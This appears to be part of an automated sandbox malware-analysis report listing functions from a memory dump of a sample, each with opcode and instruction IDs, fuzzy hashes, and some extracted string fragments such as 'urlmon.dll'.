                                          control_flow_graph 508 299110b-2991110 509 29910ad-29910d4 508->509 510 2991112-2991153 508->510 511 29910d6-29910e9 call 29a4e16 509->511 512 2991156-2991168 call 29a4e16 510->512 519 29910eb-29910ee 511->519 520 29910fd-2991106 511->520 517 299116a-2991174 512->517 518 2991186-29911bf call 29b5826 512->518 517->512 521 2991176-2991185 517->521 525 29911c4-29911c9 518->525 523 29910f0-29910f4 519->523 524 29910f6-29910fc 519->524 523->511 523->524 525->521 526 29911cb-29911e7 call 29b5126 525->526 526->521 529 29911e9-299120c call 29b5906 526->529 529->521 532 2991212-2991235 call 29b5906 529->532 532->521 535 299123b-2991259 532->535
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3d84043eac9cd2a077fb8075e428e69f283c11b5ae0593ce363bd2ed8f5a8d0
                                          • Instruction ID: 8d1919e1743a702fc761706001b1d00d2b34a85071c16871764a4343d2a9b56f
                                          • Opcode Fuzzy Hash: e3d84043eac9cd2a077fb8075e428e69f283c11b5ae0593ce363bd2ed8f5a8d0
                                          • Instruction Fuzzy Hash: 41510EB1910219ABDB14CF99DC81AEEBBBDFF49710F50415AFA18E7240E7719541CBA0
                                          Function 029B5826 Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bd6a6df5cca54d4f76d024d0a57e700e124727d0c77b2668387f4f573308433
                                          • Instruction ID: 138e28c1218796e99d3965f2dbe4b11b0370b8bbaf55273a8519adf03b83188b
                                          • Opcode Fuzzy Hash: 4bd6a6df5cca54d4f76d024d0a57e700e124727d0c77b2668387f4f573308433
                                          • Instruction Fuzzy Hash: E731E8B5A00648AFDB14DF98D981EDFB7F9EF88300F108219F919A7240D774A951CFA5
                                          Function 029B6196 Relevance: .1, Instructions: 77COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f121854111b257bc05b4f5f609409624f29f999b5283ea8784d222fd75609ef
                                          • Instruction ID: 020c090fe5c65e56d40892cd50a3b8a9062399cb6e7e54d1486faed769f2c72d
                                          • Opcode Fuzzy Hash: 0f121854111b257bc05b4f5f609409624f29f999b5283ea8784d222fd75609ef
                                          • Instruction Fuzzy Hash: CD214CB1A00648AFDB20DF98DD41EEFB7B9EF88310F104109FD19AB240D730A911CBA5
                                          Function 029A4CF6 Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73f3c60c14609a1dbb6eec27b4efa547576513542442f59210b396483a02c30b
                                          • Instruction ID: c02c3ef32391578057769af2b2668f4a5b930f330d4ad0836dd6645845d91402
                                          • Opcode Fuzzy Hash: 73f3c60c14609a1dbb6eec27b4efa547576513542442f59210b396483a02c30b
                                          • Instruction Fuzzy Hash: EF1186727803057BF721AA55CD42FAB375D9FC8B50F244015FB08AF1C1E6A5B8114AB5
                                          Function 029B5636 Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52f26451c06e0ebae9fd5ea7ca1c0bb3fc6cbb47698fbe7355a2747cd0cc8955
                                          • Instruction ID: e6d8f725694a0c7d372d5ff810781c9aa576ca4987844ac3d0ab4292757e54eb
                                          • Opcode Fuzzy Hash: 52f26451c06e0ebae9fd5ea7ca1c0bb3fc6cbb47698fbe7355a2747cd0cc8955
                                          • Instruction Fuzzy Hash: 23118EB1A00358ABD720EBA4CD41FEFB3A9EFC5300F004509FA59AB280E77069108BA5
                                          Function 029B54B6 Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70f927df92f5855fb4a509da1175380d62c0332d386c7fc8eaea6e3cfc43400d
                                          • Instruction ID: e2e471871cc56cfd6627b12d58b5726266c5ad0bf2b2cef689376ac94edb41bf
                                          • Opcode Fuzzy Hash: 70f927df92f5855fb4a509da1175380d62c0332d386c7fc8eaea6e3cfc43400d
                                          • Instruction Fuzzy Hash: F8115E71A00758AFD720EFA8DD41FEBB3ADEFC5710F104509FA59AB280E77069118BA5
                                          Function 029B64F6 Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e44c0d24ac9a83e4dbc0106651f8f6e45fdf516143e9af47306da256b49cd6e5
                                          • Instruction ID: a8aa8e6b9d9bc0f02e7396a15fbc32204e81299f16876a86a7ba2c0f3fd59ba7
                                          • Opcode Fuzzy Hash: e44c0d24ac9a83e4dbc0106651f8f6e45fdf516143e9af47306da256b49cd6e5
                                          • Instruction Fuzzy Hash: 2A0184B6204109BBDB54DF99DC81EDB77ADAFCC750F414208BA19E3240D670E851CBA4
                                          Function 0299125A Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52098ab26235670a6586ed18db6ffda5ddf3dcd8e173bac91212ef7e75957898
                                          • Instruction ID: 66ce4e733d870b84334161b0c524f77bbeb6ce5c6d48b023a144fbb997325ca8
                                          • Opcode Fuzzy Hash: 52098ab26235670a6586ed18db6ffda5ddf3dcd8e173bac91212ef7e75957898
                                          • Instruction Fuzzy Hash: 05F02B732003176BEB006A6D9C44F9BF7DCEB85334F240126F91CCB241E27194118AE0
                                          Function 029B2186 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d26607652b98c6ade9cdcac28bae293d0c0a9a40e27d3f49e24d33cee2928f4a
                                          • Instruction ID: 82fbd2999530c1609a411b01b00f5dbdaeebb8165d59161edb0b5a1cc57b828d
                                          • Opcode Fuzzy Hash: d26607652b98c6ade9cdcac28bae293d0c0a9a40e27d3f49e24d33cee2928f4a
                                          • Instruction Fuzzy Hash: FC01D7B2C11219AF8B50DFE8C9409EEBBF9AB48700F14466AE919F3200E7715A048FA1
                                          Function 029B5736 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db0164719fb979dabe33bea240166a461ac0d9523f98fe66d716102c158d0b3b
                                          • Instruction ID: c62b59bdd6e8b467513bdf83379453bd6081621063c1967f439b112eac0a0efb
                                          • Opcode Fuzzy Hash: db0164719fb979dabe33bea240166a461ac0d9523f98fe66d716102c158d0b3b
                                          • Instruction Fuzzy Hash: 5DF01CB6200209BBCB20EE99DC81EDB77ADEFC8750F408109BA18A7241D670B9518BF4
                                          Function 029A4E16 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b49b709f85a21448ea697e0c50a162a06751debed86aea254176cc2fa97c786
                                          • Instruction ID: f51c62586bb5c7fde0f2c855ef2efc3d0a4fcf5cf0bce7813c0132f948c3295e
                                          • Opcode Fuzzy Hash: 1b49b709f85a21448ea697e0c50a162a06751debed86aea254176cc2fa97c786
                                          • Instruction Fuzzy Hash: 2DF0827180520CEBDB24CF64D841BDEBBB8EB04320F204369E8289B2C0E63597518B81
                                          Function 029B6416 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction ID: 720b44ddd439ea65175e89badf67b6cc1d3b9cda6b14fb44a98b6f3a88023331
                                          • Opcode Fuzzy Hash: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction Fuzzy Hash: 8DE06DB6200604BFC620EE98DC40EDB73ADEFC9710F004109FA18A7241D630B8118BB4
                                          Function 029B6466 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction ID: 4b67a5c79d69e6ae69d59cb54b57a1aa74d72ec2ab6be8eb7ac3888bc81e20f0
                                          • Opcode Fuzzy Hash: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction Fuzzy Hash: 89E09272200209BBCA20EE99DC41EDF77ADEFC4710F004019F918A7240DB70BC108BB4
                                          Function 029B82A6 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0078b20b575cff6bdf04d29a1c1f368d4e461503d5724fd8c82c52b630b4c22
                                          • Instruction ID: 97f955ba8ccd85d7d7c6201045212b402c883428c3b83514f6d883e3b7ab933d
                                          • Opcode Fuzzy Hash: b0078b20b575cff6bdf04d29a1c1f368d4e461503d5724fd8c82c52b630b4c22
                                          • Instruction Fuzzy Hash: ADE04F72A406142BC62165899E05FE77B5D9FC5BA0F090074FE089B341E660BD0086E5
                                          Function 029B60F6 Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction ID: 36bca40d1c6d99e1e76bf37357f8855f286d136f6f843dd6595aa72c9b34f10a
                                          • Opcode Fuzzy Hash: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction Fuzzy Hash: A5E04F366002147BC220EB99DC40FDBB79DDFC5754F008415FA18A7140CA70790187F0
                                          Function 029A4E13 Relevance: .0, Instructions: 24COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7391bf8901986a9b17ae5f38e18c1945e6a19724ffee3e29bb7fad911fe8993
                                          • Instruction ID: dec4df6b7a93cae7bf265f9d69469be6177c66340d2c5afd2205c118802162bc
                                          • Opcode Fuzzy Hash: f7391bf8901986a9b17ae5f38e18c1945e6a19724ffee3e29bb7fad911fe8993
                                          • Instruction Fuzzy Hash: 0CE09271819248EAEB14CFB4E880BDEBB69DF41320F2447AEE41497280D63A9741CB81
                                          Function 029B81C6 Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1750a516c9fc08098880a495e53598497183f4eaf953023a1744859ac6b06937
                                          • Instruction ID: 9431d3babbc4eadd329bb991910020170f60900ae2f994e6dada4112704e75c9
                                          • Opcode Fuzzy Hash: 1750a516c9fc08098880a495e53598497183f4eaf953023a1744859ac6b06937
                                          • Instruction Fuzzy Hash: DBC080B26403087FDB00DB8CCC45F7533DD9B48710F444094BA0C8B341D570F9108756

                                          Non-executed Functions

                                          Function 05818D29 Relevance: 15.2, Strings: 12, Instructions: 235COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: N$%b$*$1$6L$<\$JW$Z$[Z$gi$i$D
                                          • API String ID: 0-408350142
                                          • Opcode ID: 37f6701ea084eda53657d3b46895474eb0c82b084461f711c10671399f48d9fe
                                          • Instruction ID: 6b9d620e05cc716024b3a122410b0abc133e84d6d87e8ddd6b41b899ce43772c
                                          • Opcode Fuzzy Hash: 37f6701ea084eda53657d3b46895474eb0c82b084461f711c10671399f48d9fe
                                          • Instruction Fuzzy Hash: 84C1A1B0E05219CFEB14CF98C894BADBBB6BF45308F208199D809BB245C7755985CF59
                                          Function 029A0B8F Relevance: 51.4, Strings: 41, Instructions: 170COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                          • API String ID: 0-3248090998
                                          • Opcode ID: 3a7c324d234dcc2278cf1b7cbda0d7c945ea42c4d9e1e0fc547d644f14917d02
                                          • Instruction ID: 04bba75983d55fbd6bc9e08f82d7b6191041aea3a2844aaf65ffc75cc01d564e
                                          • Opcode Fuzzy Hash: 3a7c324d234dcc2278cf1b7cbda0d7c945ea42c4d9e1e0fc547d644f14917d02
                                          • Instruction Fuzzy Hash: F6910FF08052A98ACB118F55A5603DFBF71BB85304F1581E9C6AA7B243C3BE4E85DF90
                                          Function 029AF6F6 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                          • API String ID: 0-1002149817
                                          • Opcode ID: 4eabe280c3e84360fd2c635df3740e5e19488a95a821648fe1a84619391137c3
                                          • Instruction ID: 977a0d685b7a35cdaf00bc63c2db40e5ca82efdb320a3bbe0e8fae274173ed3a
                                          • Opcode Fuzzy Hash: 4eabe280c3e84360fd2c635df3740e5e19488a95a821648fe1a84619391137c3
                                          • Instruction Fuzzy Hash: 79C10DB1C01368AADB61DFA4DD54BEEBBB9AF45304F0081DAD50CB7241E7B54A88CF91
                                          Function 02990E94 Relevance: 22.6, Strings: 18, Instructions: 60COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "YXE$#?&'$D^X\$D^X\EX]$D__E$EX]$K3?Z$SF8E$X\EX$YRFZ$Z\K&$[EY_$[XEZ$]KC $^EZP$^E[K$^Y]K$k
                                          • API String ID: 0-106748587
                                          • Opcode ID: f7fa40ca4b4f56477eddee28ef315d60c4eb2398fdc4189cff246ce583ad05c9
                                          • Instruction ID: a5c8e7cab0e5d8a3d7a6fbe533821e87de6c433a262f0724e79343fecaa9ecea
                                          • Opcode Fuzzy Hash: f7fa40ca4b4f56477eddee28ef315d60c4eb2398fdc4189cff246ce583ad05c9
                                          • Instruction Fuzzy Hash: 0B31BCF0D042A8DBDB25CFE5E9886ADFFB0BB04308F608299D4696F201D7315A96CF51
                                          Function 029A7CD6 Relevance: 17.7, Strings: 14, Instructions: 194COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x$ZPK
                                          • API String ID: 0-3141071198
                                          • Opcode ID: bcf3b92618a5060c3538064cf819c0f41d990b7e9a11815f1e5911d5a51140a2
                                          • Instruction ID: 4ea08192298dc884698bdde494728e5e73fecae74218723cae525e4633c60b7c
                                          • Opcode Fuzzy Hash: bcf3b92618a5060c3538064cf819c0f41d990b7e9a11815f1e5911d5a51140a2
                                          • Instruction Fuzzy Hash: 21712FB2C10718AADB65DFA4CD41FEEB7BEBF48701F044199E509B6150EB705B888FA1
                                          Function 0299B8ED Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                          • API String ID: 0-685823316
                                          • Opcode ID: d9ce6af5d9982c71f12f42f2bead3f0d8a6ecc32de6eaec95bf7a13d11a11802
                                          • Instruction ID: 82a2c9a8e6546885fd00744785e2afa9d1d7b6873fdbd3368584b066cc866e4d
                                          • Opcode Fuzzy Hash: d9ce6af5d9982c71f12f42f2bead3f0d8a6ecc32de6eaec95bf7a13d11a11802
                                          • Instruction Fuzzy Hash: 193178B1D51218AEEF50DFE4CC84BEE7BB9BF48704F04815DE618BA180DBB556488FA4
                                          Function 029A2DD1 Relevance: 10.1, Strings: 8, Instructions: 132COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$P$e$i$m$o$r$x
                                          • API String ID: 0-620024284
                                          • Opcode ID: f1b9e26a0361b5f77cc2dcf29a9375c0ecc04859e63d0c372f3f6f1a1f400fae
                                          • Instruction ID: 1969fdfadc951c6a2f127545a727ab7796a4dfde2b00861e65f42784fca4393d
                                          • Opcode Fuzzy Hash: f1b9e26a0361b5f77cc2dcf29a9375c0ecc04859e63d0c372f3f6f1a1f400fae
                                          • Instruction Fuzzy Hash: 0541A7B2C10218BBEB21DBA4DD40FEF777EAF98700F00859DA50DA7140EAB557498FA1
                                          Function 029AFF46 Relevance: 10.1, Strings: 8, Instructions: 119COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: L$S$\$a$c$e$l$ZPK
                                          • API String ID: 0-2546773622
                                          • Opcode ID: 383de64aed1c1d8bf2d689c4e3673d08828bd6aee9653fea6c716d966c850692
                                          • Instruction ID: 8e0081e012837088e8fab931b3a235fed2a8dc3099d3dd6418ae6badaaa8ce29
                                          • Opcode Fuzzy Hash: 383de64aed1c1d8bf2d689c4e3673d08828bd6aee9653fea6c716d966c850692
                                          • Instruction Fuzzy Hash: DB414DB2C1421CAADB11DFA4DD84EEFB7B9BF88710F05816AE909A7100E7719A458F90
                                          Function 029A719E Relevance: 7.7, Strings: 6, Instructions: 203COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $i$l$o$u$ZPK
                                          • API String ID: 0-870066133
                                          • Opcode ID: c9b16bf71e83107fad1c210c5cea37ef512424ec10db9d93da51e6ee1d7d661c
                                          • Instruction ID: d8ba8fc7fc60ad4a713919fd42965d69ba72079761e1f10f5ff95ee57797712d
                                          • Opcode Fuzzy Hash: c9b16bf71e83107fad1c210c5cea37ef512424ec10db9d93da51e6ee1d7d661c
                                          • Instruction Fuzzy Hash: FA7152B1900308AFDB25DBE4DC81FEFB7FDAF88700F144559E51997240E735AA418B90
                                          Function 029A7A91 Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: F$P$T$f$r$x
                                          • API String ID: 0-2523166886
                                          • Opcode ID: ed2faa3621adf3a0476feb02e9b246a49f5767f5ccbc074ec7445465b3576236
                                          • Instruction ID: 4cdc032c855418c8202985b1caf7734ac98d701febd68cc13ef6b6cdb87412b4
                                          • Opcode Fuzzy Hash: ed2faa3621adf3a0476feb02e9b246a49f5767f5ccbc074ec7445465b3576236
                                          • Instruction Fuzzy Hash: BB51E0B1900705AAEB35DFA4CD45BEEF7BDBF44304F04865DA54866280E7B4AA44CFD2
                                          Function 029A71A6 Relevance: 7.6, Strings: 6, Instructions: 126COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $i$l$o$u$ZPK
                                          • API String ID: 0-870066133
                                          • Opcode ID: ea6dc1e554f820f61f0facef9d56075add47b25e5d09cbf634458e17dba3da81
                                          • Instruction ID: cf1c88025df848b0b7cf58ff220409bab22164760375158f0d98c3a0cd1ac58f
                                          • Opcode Fuzzy Hash: ea6dc1e554f820f61f0facef9d56075add47b25e5d09cbf634458e17dba3da81
                                          • Instruction Fuzzy Hash: 9C4129B1900308AFDB20DFA4DC85FEFBBFDEB88700F104559E559A7240E770AA418BA0
                                          Function 029A6E36 Relevance: 6.6, Strings: 5, Instructions: 303COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o$ZPK
                                          • API String ID: 0-2374797950
                                          • Opcode ID: 10d8d6e7c955475d6deb88e5652d03cc1902428470d7e077ecb4f1369cc5ee02
                                          • Instruction ID: bf47e7ae1dcbaa05f4603d836f3b3fc3ac1e74da34ce3917a8aa27b4252f6d60
                                          • Opcode Fuzzy Hash: 10d8d6e7c955475d6deb88e5652d03cc1902428470d7e077ecb4f1369cc5ee02
                                          • Instruction Fuzzy Hash: 00B118B5A00308AFDB24DBA4CD95FEFB7FDAF88704F108558E619A7240D771AA41CB90
                                          Function 029A7766 Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$h$o
                                          • API String ID: 0-3662636641
                                          • Opcode ID: f0329bde49217cc22bcd13697bb86161c5062e143863b17806e91b92b4d1a959
